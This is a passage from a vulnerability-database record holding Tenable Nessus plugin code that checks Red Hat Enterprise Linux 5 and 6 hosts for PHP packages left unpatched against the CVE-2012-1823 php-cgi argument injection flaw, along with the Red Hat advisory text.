script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-zts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0546\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-common-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xml-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-34.el5_8\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-34.el5_8\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-bcmath-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-bcmath-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-bcmath-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-cli-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-cli-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-cli-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-common-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-common-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-common-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-dba-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-dba-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-dba-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-debuginfo-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-debuginfo-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-debuginfo-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-devel-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-devel-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-devel-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-embedded-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-embedded-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-embedded-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-enchant-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-enchant-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-enchant-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-gd-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-gd-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-gd-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-imap-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-imap-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-imap-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-intl-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-intl-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-intl-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-ldap-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-ldap-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-ldap-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-mbstring-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-mbstring-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-mbstring-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-mysql-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-mysql-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-mysql-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-odbc-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-odbc-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-odbc-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-pdo-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-pdo-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-pdo-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-pgsql-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-pgsql-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-pgsql-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-process-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-process-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-process-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-pspell-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-pspell-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-pspell-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-recode-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-recode-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-recode-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-snmp-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-snmp-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-snmp-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-soap-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-soap-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-soap-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-tidy-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-tidy-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-tidy-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-xml-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-xml-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-xml-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-xmlrpc-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-xmlrpc-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-zts-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-zts-5.3.3-3.el6_2.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-zts-5.3.3-3.el6_2.8\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-18T02:22:29", "bulletinFamily": "scanner", "description": "Updated php packages that fix one security issue are now available for\nRed Hat Enterprise Linux 5.3 Long Life, and Red Hat Enterprise Linux\n5.6, 6.0 and 6.1 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script", "modified": "2020-03-02T00:00:00", "id": "REDHAT-RHSA-2012-0568.NASL", "href": "https://www.tenable.com/plugins/nessus/64035", "published": "2013-01-24T00:00:00", "title": "RHEL 5 / 6 : php (RHSA-2012:0568)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0568. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64035);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/10/24 15:35:35\");\n\n script_cve_id(\"CVE-2012-1823\");\n script_xref(name:\"RHSA\", value:\"2012:0568\");\n\n script_name(english:\"RHEL 5 / 6 : php (RHSA-2012:0568)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php packages that fix one security issue are now available for\nRed Hat Enterprise Linux 5.3 Long Life, and Red Hat Enterprise Linux\n5.6, 6.0 and 6.1 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script's source\ncode or arbitrary code execution with the privileges of the PHP\ninterpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available\nthat allows remote code execution in affected PHP CGI configurations.\nThis flaw does not affect the default configuration in Red Hat\nEnterprise Linux 5 and 6 using the PHP module for Apache httpd to\nhandle PHP scripts.\n\nAll php users should upgrade to these updated packages, which contain\na backported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-1823.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2012-0568.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", 